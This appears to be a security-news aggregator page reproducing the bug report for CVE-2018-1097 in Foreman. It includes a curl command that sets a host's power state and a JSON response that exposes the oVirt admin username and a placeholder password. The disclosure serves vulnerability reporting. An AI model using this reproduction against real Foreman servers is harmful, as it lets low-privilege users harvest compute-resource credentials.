Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2018-1097: Bug #22546: CVE-2018-1097: curl api to change power state on ovirt compute_resource exposes credentials

A flaw was found in foreman before 1.16.1. The issue allows users with limited permissions for powering oVirt/RHV hosts on and off to discover the username and password used to connect to the compute resource.

CVE
Open in Source
#js#pdf

CVE-2018-1097: curl api to change power state on ovirt compute_resource exposes credentials

Description

Looks like the same issue as https://bugzilla.redhat.com/show_bug.cgi?id=1211613 so perhaps this is a regression.

curl -X PUT -H “Content-Type:application/json” -H “Accept:application/json” -k -u user:password -d ‘{"power_action": "on"}’ https://foreman/api/v2/hosts/testhost.domain.name/power

{"power":{"raw":{"name":"testhost.domain.name","href":"/ovirt-engine/api/v3/vms/b67a994d-68f5-4cba-a515-c79536ce55fe","id":"b67a994d-68f5-4cba-a515-c79536ce55fe","client":{"api_entrypoint":"https://ovirt.domain.name/ovirt-engine/api/v3","credentials":{"username":"admin@internal","password":"unmaskedpassword"},

Associated revisions

Also available in: Atom PDF

Related news

CVE-2014-0208: Foreman :: Security

Cross-site scripting (XSS) vulnerability in the search auto-completion functionality in Foreman before 1.4.4 allows remote authenticated users to inject arbitrary web script or HTML via a crafted key name.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE